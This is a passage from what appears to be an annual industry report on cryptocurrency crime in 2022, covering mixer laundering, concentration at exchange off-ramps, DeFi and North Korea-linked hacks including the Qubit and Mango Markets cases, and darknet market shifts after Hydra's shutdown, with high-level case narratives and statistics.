Mixers are a popular obfuscation service used by crypto criminals, taking in 8.0% of all funds sent from illicit addresses in 2022. Mixers function by taking in cryptocurrency from multiple users, mixing it all together, and sending each user an amount equivalent to what they put in. The result is that each user's cryptocurrency can now only be traced back to the mixer, rather than to its original source, unless special blockchain analysis techniques are employed. You can learn more about how different types of mixers work here.

There are many legitimate use cases for mixers, most of which are related to financial privacy. For example, if someone knows your cryptocurrency address, they can see virtually your entire transaction history on the blockchain, so it's reasonable for users to try and prevent this with mixers. Of course, the financial privacy provided by mixers is also valuable to criminals, hence their popularity as a destination for illicit funds. In May 2022, OFAC sanctioned a mixer for the first time ever when it designated Blender.io for its role in laundering cryptocurrency stolen by North Korean hacking syndicate Lazarus Group. OFAC didn't waste any time designating its second mixer, Tornado Cash, in August for the same reasons.

The sanctioning of prominent mixers may have contributed to two trends we observed in 2022: The total amount of cryptocurrency sent to mixers fell significantly, and the funds that did travel to mixers were more likely to come from illicit sources.



**Yearly cryptocurrency received by mixers by source, 2016–2022**

Mixers processed a total of $7.8 billion in 2022, 24% of which came from illicit addresses, whereas in 2021, they processed $11.5 billion, only 10% of which came from illicit addresses. The data suggests that legitimate users have decreased their use of mixers, possibly due to law enforcement actions against prominent ones, while criminals have continued to use them. It's also worth noting that the vast majority of illicit value processed by mixers is made up of stolen funds, a large share of which were stolen by North Korea-linked hackers, who are unlikely to be dissuaded by the threat of U.S. sanctions given they reside in a non-cooperative jurisdiction.

A0303



Other sanctioned entities and darknet markets also accounted for significant shares of value received by mixers in 2022.

## Money laundering concentration at fiat off-ramps

As we discussed above, fiat off-ramp services like exchanges are crucial for money laundering, as those are the services where criminals can turn crypto into cash, which is likely their ultimate goal. Fiat off-ramps are also among the most heavily regulated cryptocurrency services, and their compliance teams have an important role to play in flagging incoming illicit funds and preventing them from being exchanged for cash. But while there are thousands of cryptocurrency services offering fiat off-ramping, a select few receive most of the illicit funds we observe on-chain.



915 unique fiat off-ramping services received illicit cryptocurrency in 2022, down from 1,124 in 2021. Some of that dropoff is likely due to exchanges going out of business during the bear market. Of the illicit funds received by exchanges, 67.9% went to just five services, all of which are centralized exchanges. This represents an increased concentration compared to 2021, when the top five services received only 56.7% of illicit funds.

But what about the individual exchange users facilitating this activity? We can assume that many of the criminals sending funds to fiat off-ramps are using an account at the service that they themselves control. But in some cases, criminals work with specialized money laundering service providers, who control the accounts and help criminals convert their cryptocurrency into cash once it arrives at the exchange. Those businesses fall into the category of nested services, meaning services that are built on top of larger exchanges, using those exchanges' deposit addresses to access their liquidity and trading pairs. Most nested services are legitimate businesses — many prominent over-the-counter (OTC) brokers, for instance, operate as nested services. However, on-chain data suggests that a small group of nested services facilitate the majority of money laundering, either due to negligence or purposeful catering to crypto criminals.

For that reason, it's useful to analyze the specific service deposit addresses that account for the majority of money laundering activity, as we can generally attribute the activity of a given deposit address to a user at the service whose account is linked to that deposit address. In the graph below, we look at all off-ramp service deposit addresses that received any illicit funds in 2022, bucketed by the range in value of illicit funds received.

A0305



*How to read this graph: This graph shows service deposit addresses bucketed by how much total illicit cryptocurrency each address received individually in 2022. Each blue bar represents the number of deposit addresses in the bucket, while each grey bar represents the total illicit cryptocurrency value received by all deposit addresses in the bucket. Using the first bucket as an example, we see that 1,220,154 deposit addresses received between $0 and $100 worth of illicit cryptocurrency, and together all of those deposit addresses received a total of $38 million worth of illicit cryptocurrency.*

The graph shows that most cryptocurrency money laundering is facilitated by a very small group of people. Four deposit addresses cracked $100 million in illicit cryptocurrency received in 2022, and combined received just over $1.0 billion, while the 1.2 million deposit addresses receiving under $100 in illicit funds account for $38 million in total. Further, 51% of the $6.3 billion in illicit funds received by fiat off-ramp services in 2022 went to a group of just 542 deposit addresses. Those numbers represent a lower level of money laundering concentration at the deposit address level than we saw in 2021, even though 2022 saw a slight uptick in concentration at the service level. One possible reason for this is that continued law enforcement crackdowns against crypto money launderers, such as the shutdown of the exchange Bitzlato, have spooked the biggest money laundering service providers, or encouraged them to spread their operations across more deposit addresses.

We also see high variance in the degree of money laundering concentration by crime type.



**Money laundering concentration by crime type: Share of total illicit value received by top deposit addresses, 2022**

Just 21 deposit addresses account for 50% of all funds sent from ransomware to fiat off-ramps, while the top 21 deposit addresses for funds received from darknet markets account for just 18%.

Despite the drop in overall concentration, 51% of illicit funds moving to just 542 deposit addresses at 83 exchanges still represents a high level of money laundering concentration. If law enforcement and compliance teams were able to disrupt the individuals and groups behind those addresses, it would be much more difficult for criminals to launder cryptocurrency at scale, and go a long way toward making the ecosystem safer.

## Underground money laundering services are a growing concern

Another money laundering trend we've observed is the growth of underground services that aren't as publicly accessible or well-known as standard mixers, as they are typically accessible only through private messaging apps or the Tor browser, and usually only advertised on darknet forums.

We've written above and in past Crypto Crime Reports about OTC brokers nested on exchanges that launder large quantities of illicit funds, many of which seem to explicitly cater to cybercriminals. While this activity still exists, we're also seeing the rise of underground money laundering services with brand names and custom infrastructure, which vary in terms of complexity. Some function simply as networks of private wallets, while others are more akin to an instant exchanger or mixer. But generally, what links them is that they typically move cryptocurrency to exchanges on behalf of

cybercriminals, exchange them for either fiat currency or clean crypto, then send that back to the cybercriminals. Like the nested OTC services, many of these underground services also use those exchanges for liquidity. We can see one example on the Chainalysis Reactor graph below, though names of relevant illicit organizations have been redacted due to ongoing investigations.



In this case, the underground laundering service, which functions similarly to a mixer, helped an affiliate for a prominent ransomware strain move funds to a deposit address at a large, centralized exchange. The deposit address is believed to be controlled by the laundering service itself.

Underground money laundering service activity like that shown above isn't as easy to spot as most activity on public blockchains — identifying these services' addresses requires extensive investigative work, and untangling their transactions requires advanced blockchain analysis techniques such as demixing. That means it's difficult to analyze these services' activity at scale. However, we can estimate their activity by analyzing the activity of all wallets and networks of wallets that meet the following criteria:

· Receive large amounts of cryptocurrency from illicit services
· Send large amounts of cryptocurrency to exchanges and other fiat off-ramps

The graph below shows the yearly cryptocurrency value received by wallets that fit those criteria.



**Total illicit value moving to suspected underground laundering services, 2019–2022**

Total cryptocurrency moving to wallets fitting those criteria has grown over the last few years, and hit $6 billion in 2022. Again, these are estimates — we can't guarantee that all of the wallets included in this analysis are necessarily underground laundering services, but their on-chain activity suggests that they could be. It's also possible that usage of underground money laundering services will pick up as high-risk exchanges, which have facilitated this activity in the past, face increased pressure from law enforcement, as we saw with Garantex and Bitzlato.

## Criminal balances dropped in 2022

As we mentioned previously, criminals will often leave funds in a personal wallet, or in a wallet associated with a criminal service for extended periods of time. In some cases, this may be because their crimes have generated enough attention that they don't feel it's possible to move the funds without investigators or industry observers calling it out — we see this often with funds stolen in hacks. In other cases, this may reflect an intention to hold cryptocurrency in the expectation its price will rise, or to continue using it for other criminal endeavors. Thanks to the transparency of the block-chain, we can track these criminal balances granularly to know how much confirmed illicit entities are holding at any given time. Below, we'll take a look at how criminal balances changed in 2022.

A0309



Two things stand out: The first is that criminal balances have plummeted in value in 2022, from $12.0 billion at the end of 2021 to just $2.9 billion. Price declines in the ongoing bear market and large, successful seizures by law enforcement in 2022 are the most likely causes of this.

Second, we can see that stolen funds dominate on-chain criminal balances. This is likely due to the fact that the amount of cryptocurrency stolen in hacks has skyrocketed over the last two years, and that these hacks often become huge points of discussion on crypto Twitter and in other industry forums, with many tracking the funds publicly and sharing the addresses holding stolen funds. This can make it difficult for hackers to move stolen funds to a fiat off-ramp, which could be one reason they choose to leave the funds sitting in personal wallets.

Criminal balances are valuable to track as they represent a lower-bound estimate of cryptocurrency that could potentially be seized by law enforcement — the true number for criminal balances is likely much higher, as it includes funds associated with addresses we've yet to attribute to criminal entities and funds derived from offline criminal activity and converted to cryptocurrency after the fact.

Investigative agencies have continued to ramp up their ability to seize cryptocurrency in 2022, with the IRS Criminal Investigation Unit announcing they seized $7 billion worth of digital assets last year, more than double the amount seized in 2021. 2022 saw several other notable stories of crypto-currency seized from criminals, including:

- A record $3.6 billion seized from two individuals accused of laundering funds stolen in the 2016 hack of Bitfinex

- The November 2021 seizure of $3.36 billion in Bitcoin stolen from darknet market Silk Road, which was later announced publicly in November 2022

- The seizure of $30 million worth of cryptocurrency stolen from Axie Infinity's Ronin Bridge, marking the first successful seizure of cryptocurrency stolen by North Korean hacking syndicate Lazarus Group

Our data on criminal balances suggests there are still more opportunities for successful seizures, and more generally, illustrates a crucial difference between financial investigations in cryptocurrency versus fiat: In cryptocurrency, criminal holdings can't be stashed away in opaque networks of banks and shell corporations — almost everything is out in the open.

A0311

# Stolen Funds

# 2022 Biggest Year Ever For Crypto Hacking with $3.8 Billion Stolen, Primarily from DeFi Protocols and by North Korea-linked Attackers



2022 was the biggest year ever for crypto hacking, with $3.8 billion stolen from cryptocurrency businesses. Hacking activity ebbed and flowed throughout the year, with huge spikes in March and October, the latter of which became the biggest single month ever for cryptocurrency hacking, as $775.7 million was stolen in 32 separate attacks.

A0313



**Total value stolen in crypto hacks and number of hacks by month, 2022**

Below, we'll dive into what kinds of platforms were most affected by hacks, and take a look at the role of North Korea-linked hackers, who drove much of 2022's hacking activity and shattered their own yearly record for most cryptocurrency stolen.

A0314

# DeFi protocols by far the biggest victims of hacks

In last year's Crypto Crime Report, we wrote about how DeFi protocols in 2021 became the primary target of crypto hackers. That trend intensified in 2022.



DeFi protocols as victims accounted for 82.1% of all cryptocurrency stolen by hackers — a total of $3.1 billion — up from 73.3% in 2021. And of that $3.1 billion, 64% came from cross-chain bridge protocols specifically. Cross-chain bridges are protocols that let users port their cryptocurrency from one blockchain to another, usually by locking the user's assets into a smart contract on the original chain, and then minting equivalent assets on the second chain. Bridges are an attractive target for hackers because the smart contracts in effect become huge, centralized repositories of funds backing the assets that have been bridged to the new chain — a more desirable honeypot could scarcely be imagined. If a bridge gets big enough, any error in its underlying smart contract code or other potential weak spot is almost sure to eventually be found and exploited by bad actors.

## How do we make DeFi safer?

DeFi is one of the fastest-growing, most compelling areas of the cryptocurrency ecosystem, largely due to its transparency. All transactions happen on-chain, and the smart contract code governing DeFi protocols is publicly viewable by default, so users can know exactly what will happen to their funds when they use them. That's especially attractive now in 2023, as many of the market blowups of the past year were due to a lack of transparency into the actions and risk profiles of centralized cryptocurrency businesses. But that same transparency is also what makes DeFi so vulnerable — hackers can scan DeFi code for vulnerabilities and strike at the perfect time to maximize their theft

A0315

DeFi code auditing conducted by third-party providers is one possible remedy to this. Blockchain security firm Halborn is one such provider, and is notable for its clean track record — no DeFi protocol to pass a Halborn audit has subsequently been hacked. We spoke with Halborn COO David Schwed, whose background includes stints in risk and security at large banks like BNY Mellon, about how DeFi protocols can better protect themselves. He emphasized that many of the issues in DeFi come down to a lack of investment in security. "A big protocol should have 10 to 15 people on the security team, each with a specific area of expertise," he told us. He indicated that the core issue is that DeFi developers prioritize growth over all else, and direct funds that could fund security measures to rewards in order to attract users. "The DeFi community generally isn't demanding better security — they want to go to protocols with high yields. But those incentives lead to trouble down the road."

Schwed told us that DeFi developers should look to traditional financial institutions for examples of how to make their platforms more secure. "You don't need to move as slow as a bank, but you can borrow from what banks do." Some measures he recommends include:

- **Test protocols with simulated attacks.** DeFi developers can simulate different hacking scenarios on testnets in order to test how their protocol stands up to the most common attack vectors.

- **Take advantage of crypto's transparency.** One huge advantage of a blockchain like Ethereum is that transactions are visible in the mempool before they're confirmed on the blockchain. Schwed recommended that DeFi developers monitor the mempool closely for suspicious activity on their smart contracts to detect possible attacks as early as possible.

- **Circuit breakers.** DeFi protocols should build out automated processes to pause their protocols and halt transactions if suspicious activity is detected. "It's better to briefly inconvenience users than to have the entire protocol get drained," said Schwed.

Schwed also told us that regulators have a role to play here, and can help make DeFi safer by setting minimum security standards that protocol developers must follow. The data on DeFi hacks makes one thing clear: Whether achieved through regulation or voluntary adoption, DeFi protocols will greatly benefit from adopting better security in order for the ecosystem to grow, thrive, and eventually penetrate the mainstream.

# North Korea-linked hackers break theft records yet again: $1.7 billion stolen

North Korea-linked hackers such as those in cybercriminal syndicate Lazarus Group have been by far the most prolific cryptocurrency hackers over the last few years. In 2022, they shattered their own records for theft, stealing an estimated $1.7 billion worth of cryptocurrency across several hacks we've attributed to them. For context, North Korea's total exports in 2020 totalled $142 million worth of goods, so it isn't a stretch to say that cryptocurrency hacking is a sizable chunk of the nation's economy. Most experts agree the North Korean government is using these stolen to fund its nuclear weapons programs.



**Yearly total cryptocurrency stolen by North Korea-linked hackers, 2016–2022**

$1.1 billion of that total was stolen in hacks of DeFi protocols, making North Korea one of the driving forces behind the DeFi hacking trend that intensified in 2022. North Korea-linked hackers tend to send much of what they steal to other DeFi protocols, not because these protocols are effective for money laundering — they're actually quite bad for money laundering given their increased transparency compared to centralized services — but rather because DeFi hacks often result in cyber-criminals acquiring large quantities of illiquid tokens that aren't listed at centralized exchanges. The hackers therefore must turn to other DeFi protocols, usually DEXes, to swap for more liquid assets.



**Destination of stolen funds: North Korea-linked hacks vs. All others, 2022**

Besides DeFi protocols, North Korea-linked hackers also tend to send large sums to mixers, which have typically been the cornerstone of their money laundering process. In fact, funds from hacks carried out by North Korea-linked hackers move to mixers at a much higher rate than funds stolen by other individuals or groups. But which mixers do they use? We'll dig in below.

## Meet the new mixer North Korean hackers have turned to following Tornado Cash's OFAC designation

For much of 2021 and 2022, North Korea-linked hackers almost exclusively used Tornado Cash to launder cryptocurrency stolen in hacks. It's not hard to see why — Tornado Cash was for a time the biggest mixer operating, and its unique technical attributes made the funds it mixes relatively difficult to trace.



However, the hackers adapted when Tornado Cash was sanctioned in August 2022. While North Korea-linked hackers have still sent some funds to Tornado Cash since then, we can see above that they diversified their mixer usage in Q4 2022, soon after the mixer's designation. This may be due to the fact that, while still operational, Tornado Cash's overall transaction volume has fallen since its designations, and mixers generally become less effective when fewer people are using them. Since then, the hackers have turned to another mixer, Sinbad, which we'll look at in more detail below.

A0319

## Sinbad

Sinbad is a relatively new custodial Bitcoin mixer that began advertising its services on the BitcoinTalk forum in October 2022. Chainalysis investigators first observed wallets belonging to North Korea-linked hackers sending funds to the service in December 2022, which we can see on the Reactor graph below.



As we've seen in many North Korea-directed hacks, the hackers bridge the stolen funds from the Ethereum blockchain — including a portion of the funds stolen in the Axie Infinity hack — to Bitcoin, then send that Bitcoin to Sinbad. During December 2022 and January 2023, North Korea-linked hackers have sent a total of 1,429.6 Bitcoin worth approximately $24.2 million to the mixer.

## North Korea-linked hackers in action: How the Qubit hack unfolded

Qubit was a South Korea-based DeFi lending protocol built on the BNB chain. Qubit also ran an associated protocol, the QBridge, that allows users to use assets on other chains as collateral to borrow against on Qubit, without actually moving those other assets onto BNB Chain. Users send assets they want to collateralize to a QBridge smart contract on those assets' chains, and QBridge mints an equivalent asset on the BNB Chain.

Unfortunately, as has happened with many cross-chain bridges, hackers found an exploitable error in the code governing QBridge, and were able to drain the protocol of all of its holdings — roughly $80 million in assets, making it South Korea's largest crypto theft of 2022. We can now share publicly for the first time that we have attributed this attack to North Korea-linked hackers, as was the case with so many other large DeFi hacks in 2022. Let's take a look at how the Qubit hack unfolded.

The exploit the Qubit hackers discovered allowed them to mint unlimited qXETH — an asset meant to represent Ether bridged from the Ethereum blockchain — from the QBridge, without actually depositing any Ether. The hackers used the unbacked qXETH as collateral to "borrow" all of the assets held by the protocol — mostly BNB coin but also several BEP-20 tokens — worth roughly $80 million at the time of the theft. The hackers then bridged those funds to the Ethereum blockchain.

**A0320**

Once they bridged the funds from BNB Chain to Ethereum, the North Korean hackers used what was at the time their go-to money laundering strategy: They sent the funds to the mixer Tornado Cash. We can see an example of some of that activity following the Qubit hack below.



The hackers received their newly mixed Ether from Tornado Cash, and from there sent a portion to a decentralized exchange to be swapped for different ERC-20 tokens, while the rest was moved to deposit addresses at various centralized exchanges. The Qubit hack exemplifies many of the key elements of the North Korean hacking strategy we saw in 2022: Exploit a DeFi protocol, bridge the funds to a blockchain where funds can't be frozen, mix them, and move them to a centralized exchange. In this case, South Korea's Transnational Crime Information Center (TCIC) of the National Intelligence Service (NIS) was able to trace the funds in partnership with Chainalysis following the theft.

While North Korea-linked hackers are undoubtedly sophisticated and represent a significant threat to the cryptocurrency ecosystem, law enforcement and national security agencies' ability to fight back is growing. Last year, for example, we saw the first ever seizure of funds stolen by North Korea-linked hackers, when agents recovered $30 million worth of cryptocurrency stolen in the Axie Infinity Ronin Bridge hack. We expect more such stories in the coming years, largely due to the transparency of the blockchain. When every transaction is recorded in a public ledger, it means that law enforcement always has a trail to follow, even years after the fact, which is invaluable as investigative techniques improve over time. Their growing capabilities, combined with the efforts of agencies like OFAC to cut off hackers' preferred money laundering services from the rest of the crypto ecosystem, means that these hacks will get harder and less fruitful with each passing year.

# Oracle Manipulation Attacks

**A0322**

# Oracle Manipulation Attacks a Rising, Unique Concern for DeFi

As we covered in our section on stolen funds, 2022 was the biggest year in crypto hacking history, with more than $3.8 billion stolen. However, not all of those attacks were what one may think of as hacks in the traditional sense. In some cases, bad actors were able to drain DeFi protocols of funds without actually taking advantage of an error in the protocol's code. These attackers were able to do this by manipulating the price oracles DeFi protocols use to ensure the assets available on their platforms are priced in accordance with the wider cryptocurrency market. As such, we'll refer to these unique instances as **oracle manipulation attacks**.

Bad actors typically carry out oracle manipulation attacks by using large amounts of cryptocurrency to quickly increase the trading volume of low-liquidity tokens on the targeted DeFi protocol, which can lead to fast, significant price increases not reflective of the wider market. Those initial funds are often sourced through a flash loan if the attacker doesn't have the funds on hand. Once an asset's price has been driven up, the attacker can then exchange their artificially inflated holdings for other tokens with greater liquidity and a more consistent value, or use them as (worthless) collateral to borrow assets, never to be repaid.

Overall, we estimate that in 2022, DeFi protocols lost $386.2 million in 41 separate oracle manipulation attacks.



**Oracle manipulation attacks: Total value stolen and number of attacks by year, 2020 - 2022**

A0323

Some attackers have tried to argue that oracle manipulation attacks aren't criminal in the same way a more straightforward hack is. In fact, Avraham Eisenberg, the individual behind one of the biggest oracle manipulation attacks of the year, claimed that his actions were perfectly legal and represented nothing more than a "profitable trading strategy." However, the SEC and CFTC both filed charges of market manipulation against him, with the DOJ also bringing an indictment. While the trial hasn't happened yet, the complaint suggests that authorities won't allow these attackers to evade responsibility, even if the targeted protocol *technically* behaved as designed. Below, we'll look at Eisenberg's infamous million attack on Mango Markets as an example of how oracle manipulation attacks can work.

## Breaking down the Mango Markets exploit

One of the biggest oracle manipulation attacks of last year was the October 2022 attack of Mango Markets, a DEX on the Solana blockchain, which saw $117 million in assets drained from the protocol. The Mango Markets exploit was particularly interesting in that the perpetrator, Avraham Eisenberg, identified himself publicly afterwards and argued that his actions didn't constitute a crime. Here's how the exploit occurred from an on-chain perspective:

1. Eisenberg started with $10 million USDC (it's possible he also used funds not attributable to him on-chain to manipulate asset prices on other exchanges), split across two separate accounts at Mango Markets.

2. Eisenberg used one account to short 488 million MNGO (MNGO, or Mango, is the governance token for Mango Markets) — effectively selling 488 million MNGO on leverage — while the other account took the opposite side of that trade, using leverage to buy the same amount.

3. Eisenberg's leveraged purchase of MNGO, combined with further buying of MNGO on other DEXes, pushed the price of MNGO up very quickly on spot exchanges. This was possible because MNGO was a low-liquidity asset without much trading volume. The account used to purchase MNGO immediately profited roughly $400 million in paper gains because all of Eisenberg's buying activity significantly boosted the asset's price.

4. With such a high portfolio value, Eisenberg was able to borrow against his artificially inflated MNGO holdings and remove virtually all of the assets held by Mango Markets. This activity caused MNGO's price to drop immediately, so his long positions were liquidated due to loss of collateral value, but it was too late — Eisenberg had already "borrowed" all of Mango Market's assets with any real value.

We can see this activity on the Chainalysis Storyline below:



Adding insult to injury, Eisenberg used the MNGO he still held after the exploit to propose and vote on a governance proposal that would allow him to return $10 million worth of cryptocurrency stolen in the attack, and keep the rest as a "bug bounty." The proposal eventually passed. While most hackers avoid publicity, Eisenberg was open about his role in the Mango Markets exploit, and seemed convinced that because the code had at all times technically run as designed, he had done nothing wrong. He even appeared on Laura Shin's popular *Unchained Podcast* to explain this perspective.

**A0325**



However, as the SEC lays out in its complaint, Eisenberg's actions allegedly qualify as market manipulation due to the false increase in MNGO trading volume — 2,000% higher on the day of the exploit compared to the average over the previous ten days — that he orchestrated. Since charges were filed, Mango Markets has also sued Eisenberg for the difference between what he stole and what he returned as a result of his governance proposal, arguing that Eisenberg was not engaged in "lawful bargaining" when he negotiated his bug bounty with the Mango Markets DAO.

A0326

# Darknet Markets

# How Darknet Markets Fought for Users In the Wake of Hydra's Collapse

2022 saw a decline in revenue from the previous year for darknet markets and fraud shops. Total darknet market revenue for 2022 ended at $1.5 billion, down from $3.1 billion in 2021.



**Darknet market and fraud shop revenue, 2020–2022**

Four of the top five highest-earning darknet markets in 2022 were conventional, drug-focused darknet markets, while just one, Brian Dumps, was a fraud shop.

A0328



Top 25 darknet markets and fraud shops by revenue, 2022

Hydra Market led the way once again as the highest-earning darknet market in 2022, even though it was sanctioned by OFAC and shut down in a joint U.S.–German operation in April — no other market beat the revenue lead it built up in those four months. Salih Altuntas, a German Federal Police agent who worked on the case said, "Hydra had a monopoly, and that gave it the time and resources to build out unique services other markets couldn't."

For instance, Hydra prided itself on customer service, with perks and thoughtfulness one would expect more from a legitimate business than an online drug market. "Hydra had a service where users could send drugs in to be tested for purity," said Altuntas. "They had a Telegram bot users could contact for first aid information in the event someone overdosed. They helped vendors connect with legal services in the event they were raided by police."

As we'll explore later, the three next-highest earning markets of the year — Mega Darknet Market, Blacksprut Market, and OMG!OMG! Market — all gained their initial market share in the wake of Hydra's collapse, with on-chain data suggesting these markets made concerted efforts to attract former Hydra users and vendors.

Hydra's closure prompted a sector-wide decline in darknet market revenues, with average daily revenue for all markets falling from $4.2 million just prior to its closure and to $447,000 immediately after. While drug markets' collective revenue hasn't recovered fully, it climbed slowly back toward previous levels in the second half of 2022.  Fraud shops, however, have continued to decline.

A0329



**Daily revenue for darknet markets vs. fraud shops, 2020–2022**

Fraud shops are a unique segment of darknet markets that sell compromised data such as stolen credit card information and other forms of personally identifying information (PII) that can be used for fraudulent activity. This decline was triggered in part by the closure of prominent fraud shops like Bypass Shop, which was shut down in March. Brian Dumps, the biggest overall fraud shop for the year, also appears to have suffered a disruption as its revenue fell almost to zero in October, though it's unclear exactly why.

While darknet markets have largely recovered after Hydra's closure and fraud shops have not, single vendor shops showed a different pattern. Single vendor shops are standalone shops set up by individual drug vendors who have typically gathered a large customer base on a larger, traditional darknet market. Setting up a single vendor shop allows those vendors to save on fees that would ordinarily go to the administrators of a traditional darknet market.

A0330



**Daily revenue: darknet markets vs. single vendor shops, 2022**

— Darknet market (30-day moving average)  — Single vendor shop (30-day moving average)

Throughout 2022, we observed a negative relationship between funds sent to regular darknet markets and those sent to single vendor shops. For instance, we see single vendor shop revenue spike beginning around March, around the same time traditional darknet market revenue began to fall. Similarly, single vendor shop revenue fell concurrently with the recovery of traditional darknet markets from around June through end of year.

## The battle for market dominance, post-Hydra shutdown

Before law enforcement shut down Hydra, it was the largest darknet market in the world. Prior to its demise, Hydra Marketplace captured 93.3% of all economic value received by darknet markets in 2022 — some $357.4 million. The Russia-based darknet market enabled drug sales and offered cybercriminals unique money laundering services. "Hydra had an internal mixer called Bitcoin Bank Mixer, which vendors could use to withdraw Bitcoin from Hydra that appeared clean on-chain," said Altuntas.

A0331



Through most of April and May, OMG captured well over 50% of total market share, reaching a peak of 65.2% on April 23, and operated virtually unchallenged by competition, indicating its potential as a Hydra successor. In June, OMG suffered a distributed denial of service (DDoS) attack, which likely caused vendors and customers to migrate to Mega Darknet Market and Blacksprut Market around that time. Similarly, Blacksprut was hacked in late November, which coincides with its decline from its peak revenue share of 68.5% a few weeks prior. Given the illicit nature of darknet markets, it's unsurprising that vendors and users would seek to leave a market that has suffered a data breach.

## How drug buyers and illicit users migrated from Hydra to other darknet markets

If we dig deeper into how Hydra's three primary successor markets jockeyed for position following Hydra's shutdown, we find that capturing the specific customers who previously relied on Hydra — both retail market customers and illicit users of Hydra's money laundering services — was crucial to the battle. We can investigate this by using on-chain data to look at where former Hydra users migrated after the market was closed. For this analysis, we'll split the remainder of 2022 after the April 5 Hydra shutdown into two time periods:

A0332

- **OMG dominance**: The 50 day-period immediately after Hydra's shutdown when OMG captured close to 100% of darknet market share.

- **Post-OMG dominance**: The rest of 2022, when OMG became one of three sizable markets alongside Blacksprut and Mega.

The two charts below show which markets Hydra's previous counterparties used the most in both of those two time periods. The color of the lines show the former Hydra users' category of activity and the thickness of the lines show the proportion of their activity flowing to new markets after Hydra was shut down.



Like the vast majority of all darknet market users, former Hydra counterparties across all categories — both retail drug buyers and criminal users — transacted almost exclusively with OMG during the OMG dominance period. In the post-OMG dominance period, OMG retained a number of those former Hydra counterparties, but lost a significant share of their activity to the other two markets across all categories.

There are two primary takeaways from this: first, signs point to these three markets having launched money laundering services similar to what Hydra offered, which would explain why so many of

Hydra's criminal users migrated to those markets. The second takeaway is just how dominant OMG was amongst Hydra's counterparties immediately following Hydra's closure. This is especially interesting given the connections between OMG and Hydra that we'll explore later.

There is direct evidence that two of the three markets in question offer money laundering services. In early January 2023, Blacksprut vendor RedBull Exchange made a post titled "Transfer from platform" that said users could withdraw Bitcoin with a 4% fixed commission fee and that funds would instantly transfer to their private wallets without going through any "checks or cleanings." The image below shows a Blacksprut overview site indicating that the service offers internal exchanges for moving funds off market, and also recommending the Russia-based BestChange exchange aggregator service should those fail.



Similar posts on Mega Darknet Market confirm it offers these services, too. We don't yet have confirmation of OMG offering money laundering services, but again, the on-chain data suggests it likely does.

## OMG, Blacksprut, and Mega Darknet markets show potential vendor and admin overlap with Hydra

Advertised as "the most advanced darknet market ever," OMG primarily provides illicit drugs, but also offers products like hacking utilities, banking information, and more. The market has a peculiar history. It first became active in early July 2020, with deposit volumes so low it appeared to be less of a darknet market and more a personal operation. However, nearly as soon as Hydra shut down, OMG began seeing high inflows for the first time, more than half of which came from Hydra counterparties.



**Weekly OMG!OMG! Market revenue by source: Hydra counterparties vs. Non-Hydracounterparties, 2022**

Blockchain analysis also reveals that several Hydra vendors migrated to OMG following Hydra's shutdown. The Chainalysis Reactor graph below shows several personal wallets associated with known Hydra vendors subsequently transacting with OMG.

A0335



The migration of vendors, plus the timing and source of OMG's initial revenue suggests that Hydra administrators may have been involved with the development of OMG. Additionally, the two markets show certain operational similarities. For instance, Hydra was unique from its competitors in that it offered location-based courier services. Upon account creation, the user would select their location and arrange "dead-drop"-style exchanges from vendor to buyer. Upon sale, the vendor would send the buyer geographic coordinates and a picture of where their well-hidden purchase could be found. OMG offers this same service, too.

A0336

Further blockchain analysis reveals an even more interesting connection: OMG's central wallets send high volumes of cryptocurrency to the same group of deposit addresses at a high-risk exchange with a heavy presence in Russia. The overlap in deposit address usage suggests that those deposit addresses may be controlled by the same individuals, which would suggest further vendor overlap or possibly even administrator overlap.



Both Blacksprut and Mega have also sent funds to deposit addresses on this exchange used previously by Hydra, but none as much as OMG. We can see this on the chart below, which shows the total amount sent by each market to shared deposit addresses.



**Overlap in deposit address usage between Hydra and other markets, 2022**

We don't have definitive evidence confirming that any of OMG's creators or administrators were formally associated with Hydra. However, the deposit address overlap and instantaneous mass migration of Hydra users to OMG following Hydra's shutdown suggests that it's certainly possible.

## How London's Metropolitan Police used blockchain analysis to investigate drug traffickers

With the right tools for tracing cryptocurrency transactions, law enforcement can not only investigate the activity of vendors selling illicit drugs on darknet markets, but also follow their transactions to discover larger criminal enterprises.

A recent Metropolitan Police (MET) investigation — Operation Cyanic — provides a great example. This investigation into the international supply of Class A, B and C drugs examined a vendor profile on a dark web marketplace. The MET identified that the profile, run by a family network, had completed thousands of cryptocurrency transactions. As such, investigators tracked and traced crypto funds to identify assets held, calculate the benefit derived from drug supply, and support the traditional financial side of the operation's investigation.

A0338

Performing digital forensics after the suspect's arrest, investigators examined a number of mobile devices, during which they identified a transaction tied to a transfer of £1,500 worth of cryptocurrency. This was used as a starting point to map the suspect's criminal activity. Tracing a recent transaction from that wallet, police found that the suspect had sent funds to another high-activity wallet also thought to be under his control. That wallet had a much higher balance, and an extensive transaction history with many other wallets. This new information helped identify other elements of a larger organized gang, providing further actionable intelligence opportunities.

The graphs below illustrate how the MET traced funds from the initial wallet to other destinations, which indicate that the suspect was part of a large-scale drug trafficking ring using cryptocurrency as a primary means of payment and money laundering.



A0339

As we see below, the suspect sent funds to several exchanges from the larger wallet one transaction away from the original, presumably to convert his cryptocurrency into cash.



Similarly, the suspect's largest wallet had sent funds via intermediary personal wallets to two highly active exchange deposit addresses, both of which held millions of dollars' worth of cryptocurrency. Those deposit addresses may also belong to the original suspect, or could have belonged to other criminal associates. While that information wasn't immediately apparent, police could leverage it to subpoena the exchanges in question for more information on who controlled those deposit addresses.



A0340

Another highly active exchange deposit address to which the suspect sent funds had a balance of over $6 million. Supporting intelligence indicated that this address had received considerable funds from individuals based in Spain, suggesting that drugs were being exported from that region to the UK. This information provided opportunities for further investigation.



In addition to these findings, the MET was able to locate the organized crime group's current assets and calculate its realizable benefit figure — found to be over £600,000 — which resulted in confiscation orders for each defendant after they had been convicted of conspiracy to supply Class A, B and C drugs.

**A0341**

# Scams

# Crypto Scam Revenue Dropped 46% in 2022, While Blockchain Analysis Finds Links Between What Appear to be Distinct Scams

While scams remain the largest form of cryptocurrency-based crime (that is, if we ignore transactions associated with OFAC-sanctioned entities, which can be criminal or not depending on jurisdiction), crypto scam revenue fell significantly in 2022, from $10.9 billion the year prior to just $5.9 billion.



**Yearly crypto scam revenue, 2017–2022**

